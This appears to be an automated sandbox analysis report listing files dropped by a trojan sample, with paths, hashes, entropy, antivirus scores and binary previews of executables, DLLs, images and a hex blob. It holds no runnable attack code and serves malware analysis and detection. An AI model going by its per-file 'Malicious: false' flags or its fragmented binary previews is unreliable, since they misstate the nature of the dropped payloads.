SHA-256:	AD84ED73711E44B7603DE3B8347F3E7EA51209AD33C97E29301C1E8DA2F0D638
SHA-512:	08BB1FD3D7F8A20E3907BCA50CE0E9E8156983B2A5760BE1114963A9F2180A8675D429CF239017B26CA9EBFB0C6F34017A4227EA27A37C3A9F61B9A1CFD10A34
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6D45.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.700660211105054
Encrypted:	false
SSDEEP:	96:KilQHKkO4lYtYaYRaWjC7DHFYEZvftWiv510bwkBNG2auyCMgzYIUn3:flQHAd8XO7G73auyCMgz/Un3
MD5:	2CECE6A0A5C1E7DBC7EC246415D3376C
SHA1:	E92ED0DF402C995E31885FE2BE26130C7BD11D7A
SHA-256:	97E6C3B0D28FD27C3455BFFF12A735B342DF4D7E1EDE5A9B47D814D5E5AC7531
SHA-512:	56FAC0C3EE56AA86BE388625A48F0F2255854ADD2AE260D8D61A91961DD8B4B419BC7672FA1C0B014B1C71F9E7AD6BCD3DB23A4BAD136EDAFCDE749717527FCF
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.7.0.6.2.1.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .4.6.3.8.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type:	Microsoft Cabinet archive data, 61476 bytes, 1 file
Category:	dropped
Size (bytes):	61476
Entropy (8bit):	7.995018321729444
Encrypted:	true
SSDEEP:	1536:NATLwfiuePkACih0/8uIwf5CiqGLhk1V/AFnGegJR:N7nePk5gKsoBha/0GTf
MD5:	308336E7F515478969B24C13DED11EDE
SHA1:	8FB0CF42B77DBBEF224A1E5FC38ABC2486320775
SHA-256:	889B832323726A9F10AD03F85562048FDCFE20C9FF6F9D37412CF477B4E92FF9
SHA-512:	61AD97228CD6C3909EF3AC5E4940199971F293BDD0D5EB7916E60469573A44B6287C0FA1E0B6C1389DF35EB6C9A7D2A61FDB318D4A886A3821EF5A9DAB3AC24F
Malicious:	false
Preview:	MSCF....$.......,...................I........w.........Tp. .authroot.stl.H#F..4..CK..<Tk...c_.d....A.F...,.&K..i.RJJ..J.".%.KY"{n...."{..Lu3.Ln........y...........M.:...<. v...H..~.#Ov.a0xN....)..C..t.z.,x.00.1``L......L.\..1.\|..2.1.0mD...H1/......G..UT7!...r.X:....D.0.0...M....I(.-.+..v#...(.r.....z.Y`&hw..Gl+.je.e.j..{.1......9f=.&.........s.W...L.].+...).f...u.....8....}R...w.X..>.A.Yw...a.x...T8V.e...^.7.q..t^.+....f.q).B.M......64.<!W(........D!.0.t "X...l.....D0.......+...A......0.o..t93.v..O1V x}H.S)....GH.6.l...p2.(4k.....!,.L`......h:.a]?......J9.\..Ww........%......a4E...q....#..a..y..M..R.t..Z2!.T.Ua.k.'O..\./ d.F>.V...3...._.J....."....wI..'..z...j..Ds...qZ...[..........O<.d.K..hH@c1....[w7..z...l....h,.b.........'.w.......bO.i{.......+.-...H..."<...L.Tu}.Y.lB.]3..4..G.3..`E..NF......{o.h]}p....G..$..4....;..&.O.d....v:Ik.T..ObLq..&.j.j...B9.(..!..\.:K`.....:O..N.....C..jD:.i.......1.....eCo.c..3o.........nN.D..3.7...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type:	data
Category:	modified
Size (bytes):	328
Entropy (8bit):	3.1122533135601187
Encrypted:	false
SSDEEP:	6:kK+/mN+SkQlPlEGYRMY9z+4KlDA3RUecl7PG1:WtkPlE99SNxAhUecl61
MD5:	BFE0683837571F3E3DDAF578E7F6FBF0
SHA1:	D621A6FEF262EF61F36AE6C475F2A678EE7FE0CA
SHA-256:	4D1A1E1D4D637CB2185508B6516A8C97D5230827CEF498260BF22B3805A81C93
SHA-512:	44CA52C64BEE574C7F0EF58236D5BFD39634992396AB5EBF0F98D6218D756974C7BB4FD76B81213EC06A619B9E5FF7AFF0DBAD7F25C85C7BABF49A7CF3178AE7
Malicious:	false
Preview:	p...... ..........i.q..(....................................................... ........3f..o......&...........$...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.3.3.6.6.b.4.9.0.6.f.d.8.1.:.0."...

C:\Users\user\AppData\Local\Temp\Adventure_19.bmp

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 100x100, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=3], baseline, precision 8, 110x110, frames 3
Category:	dropped
Size (bytes):	10521
Entropy (8bit):	7.888779038440803
Encrypted:	false
SSDEEP:	192:oXRZxdt62XpqRigPYtY0CfKTQlh5NKW6F5oJxfskCjGmXa6Pbpwr4WmKM:KRfdt62X+XoElh/KW6ifskEGeaIpwr4n
MD5:	8D61CCB44C962D7831FB6703B4AF623D
SHA1:	2BFDC667151057B3A42CDD22F9EB0E5AB0B0EF3C
SHA-256:	1EFFB5A4A46B05C024518546D4C8BBB45AD3496590E3E86AF533CF31C61512F4
SHA-512:	FE0C304F73713552ACA3A28D9CCD6BD2C53A45F72052892CC8F94D835A213F2F3C4D8D1656BD8160AE874A63FACC6B79BA763D4A724281E5F0DEDAC87F86375E
Malicious:	false
Preview:	......JFIF.....d.d.....:Exif..MM.......Q...........Q..........aQ..........a.......C....................................................................C.......................................................................n.n.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(..9...k....X.....&.2.Z.......k~I.....e...J...}..<..M..8..........".../...O.u...........5.h...71]ZZ......v..Yc...<.i'..m2_..>..#...K...,.qq.^<2\|D.V...j..ae.0Mu.^K..#k..3<."FV$HV.)..vmG..H........z.\..#......3_..Wo.g.>.o..........\|...V.}.Ho.]...q#..W667Z`..)..l._E'.....+\.w..K....O.o..5......4O..~.

C:\Users\user\AppData\Local\Temp\HPSUPD-Win32Exe.exe

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe
File Type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	58368
Entropy (8bit):	5.856484138583398
Encrypted:	false
SSDEEP:	768:t2y20tpnvfSd9bbM9tmRtTkwv9QMdVk1QKVnjphRJy26xG0XFC19Io:J20t1SdN0kvZ9pdW1QKVjzy26opD
MD5:	D600D4F40A2BE641991044EE0814BFA4
SHA1:	3BDEF3488C28D43D285C47F46B82B980A8F41CD8
SHA-256:	B0D12A7AADF51B02D52E9E88295E6E6606F68C1508C8D9323B6549AA20EC82AA
SHA-512:	27B125260AA56FCAD4153A3259ECFB898681C9B096A4A37EB32AC3B722599EA4BFB5BF00F0247136F11F73F280B85844B37F6236331A0EF3B90ED2EC70CEDA55
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Gen.Variant.Nemesis.7115.16481.exe, Detection: malicious, Browse Filename: cinchonate.exe, Detection: malicious, Browse Filename: cinchonate.exe, Detection: malicious, Browse Filename: DHL RECEIPT AWB2036472836.xlsx, Detection: malicious, Browse Filename: 72rPHMzujO.exe, Detection: malicious, Browse Filename: mic(1).exe, Detection: malicious, Browse Filename: 72rPHMzujO.exe, Detection: malicious, Browse Filename: mic(1).exe, Detection: malicious, Browse Filename: SWIFT.xlsx, Detection: malicious, Browse Filename: bena.exe, Detection: malicious, Browse Filename: payment_34662.exe, Detection: malicious, Browse Filename: bena.exe, Detection: malicious, Browse Filename: payment_34662.exe, Detection: malicious, Browse Filename: PO DP526-025840 & PO DP526-025841.xlsx, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...Kc..........."...0.................. .....@..... ....................... ............`...@......@............... ..................................................................8............................................................ ..H............text........ ...................... ..`.rsrc...............................@..@........................................H........W..4...........................................................N.((.....tS...}....F.{....o....s....F.{....o....s.....0...........{....o.....s.......&......................J.{....o.....s......((...~.().....tV...}......s....}....2.{....o....2.{....o....F.{....o....s....2.{....o....2.{....o....F.{....o....,...2.{....o....2.{....o....2.{....o....2.{....o....2.{....o....:.s....%.}y.....(....:.().....}......(....,...}....+.r...ps+...z.....s4...}.....0......

C:\Users\user\AppData\Local\Temp\Sites.UDP

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe
File Type:	data
Category:	dropped
Size (bytes):	97029
Entropy (8bit):	6.67352029006038
Encrypted:	false
SSDEEP:	1536:PQ0kJrmEiFGh45tzVKadkb4qe6BGcC44gtRujckzMc:PpkRmEiYh45tzV+NCcQQMX
MD5:	CCE79E361FEFB787AD2911F654EEAEB9
SHA1:	164FE9DCB6455C6842E01C4106E45151F7B1AFE9
SHA-256:	EFC22B0DFEC2B8D339747108AD6EFA9975FD950B73120E98B62B96EDC31BD2D0
SHA-512:	F43D00D16CBDA19B6D9E5A48EB2FFA2E3EC407B17E72892C4266A0DAB79F472F26473C241DFA923C8C92F9B8FC69E0D34DE611626F83BE6FDC460AE62E7F416E
Malicious:	false
Preview:	.w.s...s..f...f.f..5=...EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE..f...f.s.~..f....i...%n................................................/..r@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@f!...f.c...f.u......$..."vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv...........2i.AE.................................................f....j.......(..Ilkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk.i~.....n..........!.].C+++++++++++++++++++++++++++++........o....5...y.....................................................f..........;84..........................................................9q.6..........................................f.......a..t.......#...w...................................z....f.f......#z..txxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxf..............f.......mY111111111111111111111111111!...f.........'q%.nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn.........f.k..*..y.............................................e.....v....3..........................................................t.f.........8..e'..............

C:\Users\user\AppData\Local\Temp\emoji-body-symbolic.symbolic.png

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	193
Entropy (8bit):	6.41289035005742
Encrypted:	false
SSDEEP:	6:6v/lhPys693pMeNKrccoz4OtOOFImbTM0t7zlyH//jp:6v/7adpfNWcVkqfTMyUf1
MD5:	F492568998D5783731D50D7CA73AC7A3
SHA1:	E87B96367BDB02176067336A1CCE3B32EBDCB3B2
SHA-256:	7A08D7B1CC724A453A0C3EB2F36369D7FD6AC6BD965CE0B4D075D570ED369A9B
SHA-512:	2C6C726426EA6DD4C7CCC141152E24DD46BDB11D3DB45ED7BA6EAC06DE922F69E5172D5431D63B9ACF96E54B89857317CA0F87880F7B03C43AF9F7416EE95C73
Malicious:	false
Preview:	.PNG........IHDR................a....sBIT....\|.d....xIDAT8.....0.E..#d.{Gp.k.q.WP....,m..$.BH....s...A<...9..L..Fp.E..7......`......6.n....]b.5...P.....r.W..#....U_....p.P.>.&.1.....IEND.B`.

C:\Users\user\AppData\Local\Temp\iso_639-3.xml

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe
File Type:	XML 1.0 document, UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	1063988
Entropy (8bit):	4.881622518734141
Encrypted:	false
SSDEEP:	6144:z6ZdTZZl/WX4fVLcf9MvAadpxr5+ZiVHPZ6TZXjcePr:z6nTZZl/WX4fVLcqvV5+ZiX6TZXJ
MD5:	DCAD3B0F729144CE9EE9A6006D9C3E74
SHA1:	3EEF5F61BEF834B7089A87423D128990A1065E81
SHA-256:	D8AB9C2641481645A8ACF875FFA3E3CB271D2CD946691DD8E0BD48513FFF1370
SHA-512:	BB0ED1F9FBB122728776731B04C54C8FBA57BF2987D04DAD1167FC879FC8A2483093E1A8304A021D6238B408FED826E902386D7DB52B7988CE9DCC89ACB64611
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" ?>.... ....WARNING: THIS FILE IS DEPRECATED.....PLEASE USE THE JSON DATA INSTEAD.....Usually, this data can be found in /usr/share/iso-codes/json.....This file gives a list of all languages in the ISO 639-3..standard, and is used to provide translations via gettext....Copyright . 2005 Alastair McKinstry <mckinstry@computer.org>..Copyright . 2008,2012,2013 Tobias Quathamer <toddy@debian.org>.... This file is free software; you can redistribute it and/or.. modify it under the terms of the GNU Lesser General Public.. License as published by the Free Software Foundation; either.. version 2.1 of the License, or (at your option) any later version..... This file is distributed in the hope that it will be useful,.. but WITHOUT ANY WARRANTY; without even the implied warranty of.. MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.. Lesser General Public License for more details..... You should have received a co

C:\Users\user\AppData\Local\Temp\lgpllibs.dll

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	37816
Entropy (8bit):	6.374742588554942
Encrypted:	false
SSDEEP:	384:VbijnYW+DZZMwrusWsWQfRl30fP5/A5KFUkYvntA/QcP+ACxw/3MvDG/GhUVgt:dijnQDnzruRNQfv0fP5/oABCDGehHt
MD5:	9B623087B905D8FE157BDB7EC85009A8
SHA1:	4B6DD4C0292558513A840B40A991533735D55E02
SHA-256:	7FA4C9EA4BE0088D6D311BD93FA65BAF8828DA32A2FD4BF8CE0EADE552D46246
SHA-512:	8C06714F93EB05FAD19F1A96C0DB8FF030B1CD3C03D6B17C231CDE5BCE8DD8358014D87A74306C3BABEF7C573D4AF5AE80904AFBB0329D2D83FE3758EF020719
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...>..b.........." .....F...*......P.....................................................`A........................................@g.......n..x....................t..............Te...............................`...............o..X............................text...FE.......F.................. ..`.rdata..p....`.......J..............@..@.data...@............d..............@....pdata...............f..............@..@.00cfg...............l..............@..@.rsrc................n..............@..@.reloc...............r..............@..B................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\microphone-disabled-symbolic.svg

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	1401
Entropy (8bit):	5.11645334711433
Encrypted:	false
SSDEEP:	24:t4Cjlza3LWdwpQiL6Rch3jV81hF3Q59UPFkyKbRAecFhBrN3AGMH:1cL8w6iJjV8jF3894kNtAecFZTMH
MD5:	BAE5EB7B918D568E955B8885EEB5DB5A
SHA1:	FC4421C6A019D0147A13B08CBB2F0720F49E17C3
SHA-256:	273F11F9F8BD84F2A32E0CC857E21050A9A9C7713F33D9A220991DC232C470BA
SHA-512:	8A6AE1E26C9451A241655242D16368D87E23036D03D61FF75F5669D5E2930446D6003D5191622F576060E529EE21DD6E28D3408D28719A4D53BD291E673037B0
Malicious:	false
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16">. <g fill="#2e3436">. <path d="m 213.531,228.469 -1.061,1.061 14,14 1.062,-1.062 z" transform="translate(-212 -228)"/>. <path d="m 220,228 c -1.662,0 -3,1.338 -3,3 v 1.64453 l 5.2832,5.2832 C 222.72383,237.4058 223,236.73965 223,236 v -5 c 0,-1.662 -1.338,-3 -3,-3 z m -6,6 v 2.00977 c 0,2.96574 2.16538,5.4238 5,5.90039 V 244 h 2 v -2.08984 c 0.64598,-0.10861 1.24984,-0.33194 1.80859,-0.62891 l -1.11132,-1.11133 C 221.17391,240.38 220.60353,240.5 220,240.5 c -2.50669,0 -4.5,-1.99014 -4.5,-4.49023 V 234 Z m 10.5,0 v 2.00977 c 0,1.15729 -0.44099,2.19439 -1.14844,2.98632 l 1.05274,1.05274 C 225.38802,238.9836 226,237.57264 226,236.00977 V 234 Z m -7.5,1.47266 V 236 c 0,1.662 1.338,3 3,3 0.16422,0 0.3216,-0.0237 0.47852,-0.0488 z" style="line-height:normal;font-variant-ligatures:normal;font-variant-position:normal;font-variant-caps:normal;font-variant-numeric:normal;font-variant-alternates:normal;font-feature-se

C:\Users\user\AppData\Local\Temp\nsd7AB8.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	5.814115788739565
Encrypted:	false
SSDEEP:	192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
MD5:	CFF85C549D536F651D4FB8387F1976F2
SHA1:	D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
SHA-256:	8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
SHA-512:	531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."..................@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\printer-symbolic.svg

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	213
Entropy (8bit):	4.950492507724413
Encrypted:	false
SSDEEP:	6:tI9mc4slzcpG+xW6UmUuksJtjdU0t/ZME:t4Cp9xW6zUmjW0tOE
MD5:	A4ACDD85E11EA101F3BB4B5BEC3382F0
SHA1:	2DC81694D5D3C403BF696B1796385D2F64C40D77
SHA-256:	AD87999B06B9C8035CCAC8EF29D54C9E00055EE9E2DBDD9B7BA24CCF56C471E6
SHA-512:	6C7C1E913CBF7CD6B91721BD60705B3A87C398B5D69D1FA03D67EDF7C69E23AB410938EC5E0770584E5B6E218443E53A702BD389C2253F05C2D4F48B944D481E
Malicious:	false
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><g fill="#474747"><path d="M2 4c-.5 0-1 .5-1 1v4c0 .5.5 1 1 1h1V8h10v2h1c.5 0 1-.5 1-1V5c0-.5-.5-1-1-1zm2-3v2h8V1z"/><path d="M4 9v5h8V9z"/></g></svg>

C:\Users\user\AppData\Local\Temp\svejtsers.for

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	40772
Entropy (8bit):	3.99958578967024
Encrypted:	false
SSDEEP:	768:hh1uZgY2aTsCYEHD/RZpbk9hCagM99A4jloFMSD2l:REsvEHFwOagq9AAo+SCl
MD5:	15B855905F2DE48867E35606D005ACC7
SHA1:	41A4B95539290FBE3F75449D7391F9B10710612C
SHA-256:	40F9C51DAF7AB04475F462927A471E4DA0D80D3F373327992A9464849360BA40
SHA-512:	88A65458C335446084B927EE1E97D38DC3CEF52E87494611D4F47A244AE11EA7B50ABE79813FC6635084E8E32BA99F722760B4B75741E9F7D7BC68B67A8580DA
Malicious:	false
Preview:	27593E14BF48762F251F42C3A0B162B4B932AF6F508F6C5236FD53D9593278373448EBED3E8F7995FDB755B160AC8ED7146290A48D0DAE23B6EFD36FCBE6AFD753ED6D2B3CD983BA7DFC9B4EE151DD47272BE33427DFEA4750F33928D8C7C721F80C5391864ECF3C5AA12CB96F9A14071AE993D3608E24FA5B42AE924AC0E3266E1238BD9B228E4A11CA6E0613634F0F0FE72A38B123888727782AADA70E0B92A3C5CD216016D1CCD48A86C44A4812F8BD719D2F09C4C40C860DA6D34EBE16FFB1176EB131F853DB2F1151441A075B4F90BB5A16EA834D0FC931C1D8D8DDD17F99974955D19FFD8D76AF3E4EA1F220664560A816B6F1C0EDCF0ED396877D1109F96A89AC469C883F3C9FA1E83A6FEA5F049F55E811D9C54E6DC54D98B9A791969B8218AC42C64A788F5DA9EEECD6399ECB4C4A00A7F0ADA7836E7FCD2BE9D3407B3C2B4842D44E61CEC54A6F1121FA7074AD25B115F998C1453447D55053C9CC43CF76811579AE9968C92BCBAA0F18D9F18BFE5BCD4FB4433244AF9A94561C69CA25F54989D680E77C18BA86CD924021075051D3C06915D4059FC8622C90B8485A0B3E4FFC555370308A14E68BABE11715B947CCF32EF583310BF8F49D615FD12C4980406AD24C6A12F84A2457F89395FF61F4BE47B9261B7C2270B0BE93BC9D88BF45FED83D35EBA376F3B4CA09FC66FA76E903

C:\Users\user\AppData\Local\Temp\vm3ddevapi64-debug.dll

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	288328
Entropy (8bit):	6.5244639850667605
Encrypted:	false
SSDEEP:	6144:TWMbKY5G780mQB8fkrOX9rn8ndvcA5abagLgandSUbJ:aMbKY5AIvfkSX9rSdkfbanUbJ
MD5:	9ECB2FA510DCDF4BFB06DC80A83294BD
SHA1:	65E0CEC428D010B94D81BA784EA709EBA598A1CD
SHA-256:	865868E3BE461332134EFBBA9F1D8AAA5E29A0C8AD3F5A2AC47311F47D4CFD62
SHA-512:	6F70D42EE2A6CA1F2D85A84947B74EAD03FA4CD00AE5D897FC80832111D88B0D9EEFE81B5FFBC229AE9E1D97467713AF0D385C8C2E96D67B5E9008033C02CB28
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......[...............................s.....s.....s..........M...........z.....z.......................G.........Rich..................PE..d......`.........." .........j......................................................N.....`A.........................................................p..........x!......Hb..............8..............................8...................4...@....................text.............................. ..`.rdata..............................@..@.data...0#..........................@....pdata..x!......."..................@..@.didat..`....@......................@....gehcont$....P......................@..@_RDATA.......`......................@..@.rsrc........p......................@..@.reloc..............................@..B........................................................................

C:\Windows\Logs\waasmedic\waasmedic.20220526_155057_892.etl

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	2.8216989048802654
Encrypted:	false
SSDEEP:	96:8k/25QZ0UC0Y0/0D0U9D0ClX0/0U9f0Clu0M0U9N0ClRy0Sv0U95v0ClBe09G:4+T8AyAZ8ycsHyqilSMy5M+xw
MD5:	4800A275A7677855810809E8C62AEE39
SHA1:	F9D641971EC8B2EA57AFA7BD1A5E05A1D203AFF1
SHA-256:	9486DD0EB9CFC87858D85D8F3D5E4EFE4C72B8BAF3799A7203EAFC83A08FAC77
SHA-512:	7FA93D18C29D675AC4ADF57A2931281895E7D9C063680821DB3A0256849F7AFD1A2314CB5A6D90174CBBD89C767EEA326ADFB7F0E9EA9CE48E8F65BF51E9A54B
Malicious:	false
Preview:	....................................................!............................"..0...........................bJ......R...q..Zb....... ..........................................@.t.z.r.e.s...d.l.l.,.-.2.6.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.6.1...........................................................@....q............d.q..........E.C.C.B.1.7.5.F.-.1.E.B.2.-.4.3.D.A.-.B.F.B.5.-.A.8.D.5.8.A.4.0.A.4.D.7...C.:.\.W.i.n.d.o.w.s.\.l.o.g.s.\.w.a.a.s.m.e.d.i.c.\.w.a.a.s.m.e.d.i.c...2.0.2.2.0.5.2.6._.1.5.5.0.5.7._.8.9.2...e.t.l.............P.P.."..0.......................................................................8.B.........19041.1.amd64fre.vb_release.191206-1406.....5.@..........u.5.%Nb.f.};......WaaSMedicSvc.pdb....................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\03A7312A-3D2B-4807-84DA-352D7F06B3B6MPTelemetrySubmit\client_manifest.txt

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	2.9588664479635254
Encrypted:	false
SSDEEP:	3:Q9lJWlARl9OEBlZTlJlkARl9OEBlo1ln:Q9lYaEETdXEETovn
MD5:	78832DCD6FF89BA04F6DC8EEAEA25351
SHA1:	AF126BDDE978CB20A76712C2814053FC283A2E66
SHA-256:	FD13D1B3B4DB4D12A6BE71C07FB6536F83EF00782900E919E76BE7726510DB28
SHA-512:	C649D4EF86108E109E63893568EACF1C7C68874BB046E2EF82E7E109E5FC1F2ADC5CC8E367A1D4CD0EF31BBA509C679FD1F0C61FBCFFDB0E58D4454C168D1A2D
Malicious:	false
Preview:	......<.C.l.i.e.n.t.D.a.t.a.>.<./.C.l.i.e.n.t.D.a.t.a.>.....

